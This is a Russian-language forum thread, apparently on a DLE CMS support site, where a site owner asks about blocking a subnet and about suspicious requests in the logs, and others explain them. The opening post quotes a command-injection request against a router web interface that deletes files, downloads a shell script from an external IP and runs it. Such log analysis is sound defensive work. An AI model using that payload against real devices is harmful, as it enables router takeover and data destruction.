desart 6 Опубликовано: 28 февраля Рассказать Опубликовано: 28 февраля (изменено) Всем привет! Подскажите пжлста... почему данный ip или подсеть невозможно забанить? хоть в админке, хоть в .htaccess? *Подозреваю, что это вероятно из-за специфического запроса ниже: ip: 185.224.128.200 (185.224.128.0/24) GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.0 И что он вообще пытается сделать? (желательно простым языком, без премудростей о том, какие запросы к серверу бывают и, что они делают). *Нашел: "LuCI ‒ это веб-ориентированный интерфейс конфигурирования, написанный на языке программирования Lua. LuCI расшифровывается как Lua Configuration Interface." - но это безусловно мне ничего особо не говорит, кроме того, что хотят что-то записать(operation=write)... Да и о том ли я вообще?! ))) Скрытый текст сайт в разработке, лицуха + Изменено 28 февраля пользователем desart Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 29 февраля Рассказать Опубликовано: 29 февраля 9 часов назад, desart сказал: Подскажите пжлста... почему данный ip или подсеть невозможно забанить? хоть в админке, хоть в .htaccess? Как вы проверяете что нельзя? По логам сервера? Так если вы баните в DLE, то в логах сервера все также и будет присутствовать, потому что забанив в DLE, это не запрещает доступ к серверу, это запрещает доступ к DLE, а в логах все также будет присутствовать. Чтобы не видеть в логах, то и банить нужно на уровне файерволла сервера и блокировать доступ на уровне сервера. Цитата Ссылка на сообщение Поделиться на других сайтах
desart 6 Опубликовано: 29 февраля Рассказать Опубликовано: 29 февраля (изменено) Автор 12 часов назад, celsoft сказал: Как вы проверяете что нельзя? По логам сервера? Да, по логам... * Да, надо было указать, что хочу сделать 403 и не получается... Забиваю подсеть в .htaccess и по ней идёт 403(любые другие ip и подсети). А в данном случае идёт ошибка 404 - значит он попадает на стандартную страницу 404 - чего я и не могу понять... "Чтобы не видеть в логах..." - этого я не пытался сделать... я хотел 403 для него т.к. я его вставил и в админке 185.224.128.* и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404... другими словами на сервере нет чего ему надо(запрос не выполняется), НО и 403 ошибки доступа не выдаёт... *Да и вообще интересно, что за запрос такой... Изменено 29 февраля пользователем desart Цитата Ссылка на сообщение Поделиться на других сайтах
igorek-art 33 Опубликовано: 1 марта Рассказать Опубликовано: 1 марта 10 часов назад, desart сказал: Да, по логам... * Да, надо было указать, что хочу сделать 403 и не получается... Забиваю подсеть в .htaccess и по ней идёт 403(любые другие ip и подсети). А в данном случае идёт ошибка 404 - значит он попадает на стандартную страницу 404 - чего я и не могу понять... "Чтобы не видеть в логах..." - этого я не пытался сделать... я хотел 403 для него т.к. я его вставил и в админке 185.224.128.* и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404... другими словами на сервере нет чего ему надо(запрос не выполняется), НО и 403 ошибки доступа не выдаёт... *Да и вообще интересно, что за запрос такой... На сколько я помню и раньше интересовался банами по ip для сайта, хостер мне всегда писал что надо банить не в файлике папки домена, а где то в корне вашего хостинга есть тоже файлик .htaccess и именно в нем надо прописывать ip банов Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 1 марта Рассказать Опубликовано: 1 марта 10 часов назад, desart сказал: и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404. Deny from далеко не на каждой версии Апача можно выполнить, плюс этот запрос может вообще идти не на Апач. Как правильно запретить доступ на сервер нужно узнавать в службе поддержки. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
aleksandrhristich 107 Опубликовано: 1 марта Рассказать Опубликовано: 1 марта 29.02.2024 в 04:56, desart сказал: И что он вообще пытается сделать? Пытается загрузить исполняемый файл (в linux) tenda.sh, установить на него нужные ему права и запустить. А вот чтО конкретно запустить уже хз. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
aleksandrhristich 107 Опубликовано: 1 марта Рассказать Опубликовано: 1 марта Возможно это атака, нацеленая на веб-интерфейс LuCI для маршрутизаторов. cgi-bin/luci/;stok=/locale: Это путь к CGI-скрипту в интерфейсе LuCI. LuCI - это веб-интерфейс для маршрутизаторов OpenWRT или аналогичных устройств. form=country&operation=write&country=: Это параметры, передаваемые CGI-скрипту. В итоге tenda.sh загружается в папку /tmp, удаляет все файлы,загружает какой-то сценарий оболочки с удаленного сервера и выполнить его. Ну вот както так. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
desart 6 Опубликовано: 29 апреля Рассказать Опубликовано: 29 апреля (изменено) Автор 01.03.2024 в 10:44, aleksandrhristich сказал: Ну вот както так. Привет! Если не сложно "повторить" ))) еще вот такое: GET /index.php?app=core&module=system&controller=ajax&do=getCsrfKey&path=/engine/ajax/controller.php HTTP/1.0 *Нашел такое - Подделка межсайтового запроса (CSRF) - это он пытается через ajax внедриться? Скрытый текст Нашел тут, но мозг вытек через ухо от такого количества инфы, кто там кого подделывает... ХЗ)) https://0xn3va.gitbook.io/application-security-handbook/web-application/vulnerability-mitigation/cross-site-request-forgery-csrf Изменено 29 апреля пользователем desart Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 30 апреля Рассказать Опубликовано: 30 апреля Это вообще адрес обращения к стороннему ПО, а не к DLE. Для DLE такой адрес ничего не значит совершенно. Соответственно если нет стороннего ПО, то это не несет никакой угрозы, если есть какое то стороннее ПО, то возможно это попытка внедрится в DLE. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
desart 6 Опубликовано: 30 апреля Рассказать Опубликовано: 30 апреля Автор 4 минуты назад, celsoft сказал: Это вообще адрес обращения к стороннему ПО, а не к DLE. Для DLE такой адрес ничего не значит совершенно. Соответственно если нет стороннего ПО, то это не несет никакой угрозы, если есть какое то стороннее ПО, то возможно это попытка внедрится в DLE. Спасибо за ответ! Да, стороннего ПО нет, наверно наугад проверяет сайты... Он делает кучу одинаковых запросов (два одинаковых с множеством повторений): 1 - GET /index.php?app=core&module=system&controller=serviceworker&v=132e1d68871691855408&type=front&loggedIn=false HTTP/1.0 2 - GET /index.php?app=core&module=system&controller=ajax&do=getCsrfKey&path=/engine/ajax/controller.php HTTP/1.0 1 = код 200 2 = код ошибки 403 - я так понимаю отстреливает на уровне сервера... А заходит на сайт напрямую, в смысле Реферрер у него ВСЕГДА один: МОЙСАЙТ/index.php?app=core&module=system&controller=serviceworker&v=132e1d68871691855408&type=front&loggedIn=false а запрос, либо первый, либо второй с кодом ошибки 403 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 30 апреля Рассказать Опубликовано: 30 апреля 28 минут назад, desart сказал: 2 = код ошибки 403 - я так понимаю отстреливает на уровне сервера... Нет не на уровне сервера. Это делает внутренний блокировщик DLE потенциально опасных параметров, потому как в параметрах обнаружены потенциально опасные параметры. А в первом запрсосе ничего потенциально опасного нет. А во втором в параметрах передается имя PHP файла, DLE так не делает никогда, поэтому считает такой параметр небезопасным и автоматически блокирует все. 28 минут назад, desart сказал: в смысле Реферрер у него ВСЕГДА один Реферал это параметр который посылает сам клиент обращающийся к серверу, а не сервером автоматически формируется. Поэтому он может быть подделан и быть каким угодно. Считать его всегда корректным нельзя. Он корректен если это делает самостоятельнобраузер при обычном поведении пользователя, а не когда бот атакует. Поэтому принимать его за чистую монету никогда нельзя, т.к. он не относится к безопасно корректным входящим данным. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.